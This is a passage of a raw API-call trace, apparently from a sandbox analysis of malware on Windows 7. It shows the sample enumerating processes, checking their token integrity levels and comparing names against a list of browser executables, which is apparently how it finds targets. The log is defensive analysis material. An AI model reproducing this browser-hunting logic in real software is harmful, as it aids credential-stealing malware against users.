[0225.019] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.019] GetLastError () returned 0x7a [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.019] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.019] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.019] CloseHandle (hObject=0xb8) returned 1 [0225.019] CloseHandle (hObject=0xb4) returned 1 [0225.019] lstrcmpiW (lpString1="firefox.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0225.019] lstrcmpiW (lpString1="chrome.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned -1 [0225.019] lstrcmpiW (lpString1="opera.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0225.019] lstrcmpiW (lpString1="iexplore.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0225.019] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0225.019] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="disclaimer_saudi_agreed_oem.exe") returned 1 [0225.019] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0225.019] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.019] GetLastError () returned 0x7a [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.019] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.019] CloseHandle (hObject=0xb8) returned 1 [0225.019] CloseHandle (hObject=0xb4) returned 1 [0225.020] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8a0) returned 0xb4 [0225.020] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1678b8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.020] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.020] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.020] GetLastError () returned 0x7a [0225.020] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.020] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.020] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.020] CloseHandle (hObject=0xb8) returned 1 [0225.020] CloseHandle (hObject=0xb4) returned 1 [0225.020] lstrcmpiW (lpString1="firefox.exe", lpString2="colleague wrap.exe") returned 1 [0225.020] lstrcmpiW (lpString1="chrome.exe", lpString2="colleague wrap.exe") returned -1 [0225.020] lstrcmpiW (lpString1="opera.exe", lpString2="colleague wrap.exe") returned 1 [0225.020] lstrcmpiW (lpString1="iexplore.exe", lpString2="colleague wrap.exe") returned 1 [0225.020] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="colleague wrap.exe") returned 1 [0225.020] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="colleague wrap.exe") returned 1 [0225.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0225.020] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.020] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.020] GetLastError () returned 0x7a [0225.020] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.020] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.020] CloseHandle (hObject=0xb8) returned 1 [0225.020] CloseHandle (hObject=0xb4) returned 1 [0225.020] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.020] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8b0) returned 0xb4 [0225.020] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1679f0, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.020] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.020] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.020] GetLastError () returned 0x7a [0225.020] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.020] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.020] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.020] CloseHandle (hObject=0xb8) returned 1 [0225.020] CloseHandle (hObject=0xb4) returned 1 [0225.020] lstrcmpiW (lpString1="firefox.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0225.020] lstrcmpiW (lpString1="chrome.exe", lpString2="hottest-jm-depression-fought.exe") returned -1 [0225.021] lstrcmpiW (lpString1="opera.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0225.021] lstrcmpiW (lpString1="iexplore.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0225.021] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0225.021] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="hottest-jm-depression-fought.exe") returned 1 [0225.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0225.021] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.021] GetLastError () returned 0x7a [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.021] CloseHandle (hObject=0xb8) returned 1 [0225.021] CloseHandle (hObject=0xb4) returned 1 [0225.021] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x8c8) returned 0xb4 [0225.021] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167b10, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.021] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.021] GetLastError () returned 0x7a [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.021] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.021] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.021] CloseHandle (hObject=0xb8) returned 1 [0225.021] CloseHandle (hObject=0xb4) returned 1 [0225.021] lstrcmpiW (lpString1="firefox.exe", lpString2="saturday.exe") returned -1 [0225.021] lstrcmpiW (lpString1="chrome.exe", lpString2="saturday.exe") returned -1 [0225.021] lstrcmpiW (lpString1="opera.exe", lpString2="saturday.exe") returned -1 [0225.021] lstrcmpiW (lpString1="iexplore.exe", lpString2="saturday.exe") returned -1 [0225.021] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="saturday.exe") returned -1 [0225.021] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="saturday.exe") returned -1 [0225.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0225.021] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.021] GetLastError () returned 0x7a [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.021] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.021] CloseHandle (hObject=0xb8) returned 1 [0225.021] CloseHandle (hObject=0xb4) returned 1 [0225.021] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.021] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xb4 [0225.022] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x167c50, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.022] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.022] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.022] GetLastError () returned 0x7a [0225.022] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.022] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.022] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.022] CloseHandle (hObject=0xb8) returned 1 [0225.022] CloseHandle (hObject=0xb4) returned 1 [0225.022] lstrcmpiW (lpString1="firefox.exe", lpString2="WINWORD.EXE") returned -1 [0225.022] lstrcmpiW (lpString1="chrome.exe", lpString2="WINWORD.EXE") returned -1 [0225.022] lstrcmpiW (lpString1="opera.exe", lpString2="WINWORD.EXE") returned -1 [0225.022] lstrcmpiW (lpString1="iexplore.exe", lpString2="WINWORD.EXE") returned -1 [0225.022] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="WINWORD.EXE") returned -1 [0225.022] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="WINWORD.EXE") returned -1 [0225.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9a0) returned 0x0 [0225.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0x0 [0225.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbe8) returned 0x0 [0225.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6cc) returned 0x0 [0225.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa18) returned 0x0 [0225.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0225.022] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0225.022] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0225.022] GetLastError () returned 0x7a [0225.022] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0225.022] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0225.022] CloseHandle (hObject=0xb8) returned 1 [0225.022] CloseHandle (hObject=0xb4) returned 1 [0225.022] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0225.022] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x634) returned 0xb4 [0225.022] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x1681e8, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0225.022] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0225.022] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0225.022] GetLastError () returned 0x7a [0225.022] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0225.022] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0225.022] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0225.022] CloseHandle (hObject=0xb8) returned 1 [0225.022] CloseHandle (hObject=0xb4) returned 1 [0225.023] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0225.023] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0225.023] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0225.023] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0225.023] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0225.023] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0225.023] VirtualFree (lpAddress=0x160000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0225.023] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0227.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x4bfd5c | out: SystemInformation=0x0, ResultLength=0x4bfd5c*=0xc0a0) returned 0xc0000004 [0227.034] VirtualAlloc (lpAddress=0x0, dwSize=0xd0a0, flAllocationType=0x1000, flProtect=0x4) returned 0x160000 [0227.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x160000, Length=0xd0a0, ResultLength=0x0 | out: SystemInformation=0x160000, ResultLength=0x0) returned 0x0 [0227.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0227.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0227.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0227.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0227.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0227.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0227.036] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e4) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ec) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x258) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0 [0227.037] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0 [0227.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0227.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0227.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x160) returned 0x0 [0227.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x418) returned 0x0 [0227.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4dc) returned 0x0 [0227.038] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0227.038] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x8, TokenHandle=0x4bfd24 | out: TokenHandle=0x4bfd24*=0xb8) returned 1 [0227.038] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd0c | out: TokenInformation=0x0, ReturnLength=0x4bfd0c) returned 0 [0227.038] GetLastError () returned 0x7a [0227.038] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x1, TokenInformation=0x265faf8, TokenInformationLength=0x24, ReturnLength=0x4bfd0c | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd0c) returned 1 [0227.039] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0xc, TokenInformation=0x4bfd3c, TokenInformationLength=0x4, ReturnLength=0x4bfd20 | out: TokenInformation=0x4bfd3c, ReturnLength=0x4bfd20) returned 1 [0227.039] CloseHandle (hObject=0xb8) returned 1 [0227.039] CloseHandle (hObject=0xb4) returned 1 [0227.039] GetLengthSid (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0227.039] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4e4) returned 0xb4 [0227.039] GetVersionExW (in: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x7f, dwMinorVersion=0x169490, dwBuildNumber=0xfe00fe00, dwPlatformId=0x25e0590, szCSDVersion="\x01") | out: lpVersionInformation=0x4bfc10*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0227.039] OpenProcessToken (in: ProcessHandle=0xb4, DesiredAccess=0x20008, TokenHandle=0x4bfd3c | out: TokenHandle=0x4bfd3c*=0xb8) returned 1 [0227.039] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4bfd38 | out: TokenInformation=0x0, ReturnLength=0x4bfd38) returned 0 [0227.039] GetLastError () returned 0x7a [0227.040] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x265faf8, TokenInformationLength=0x14, ReturnLength=0x4bfd38 | out: TokenInformation=0x265faf8, ReturnLength=0x4bfd38) returned 1 [0227.040] GetSidSubAuthorityCount (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x265fb01 [0227.040] GetSidSubAuthority (pSid=0x265fb00*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x265fb08 [0227.040] CloseHandle (hObject=0xb8) returned 1 [0227.040] CloseHandle (hObject=0xb4) returned 1 [0227.040] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0227.040] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0227.040] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0227.040] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0227.041] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0227.041] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0227.041] OpenProcess (dwDesiredAccess=0x400, 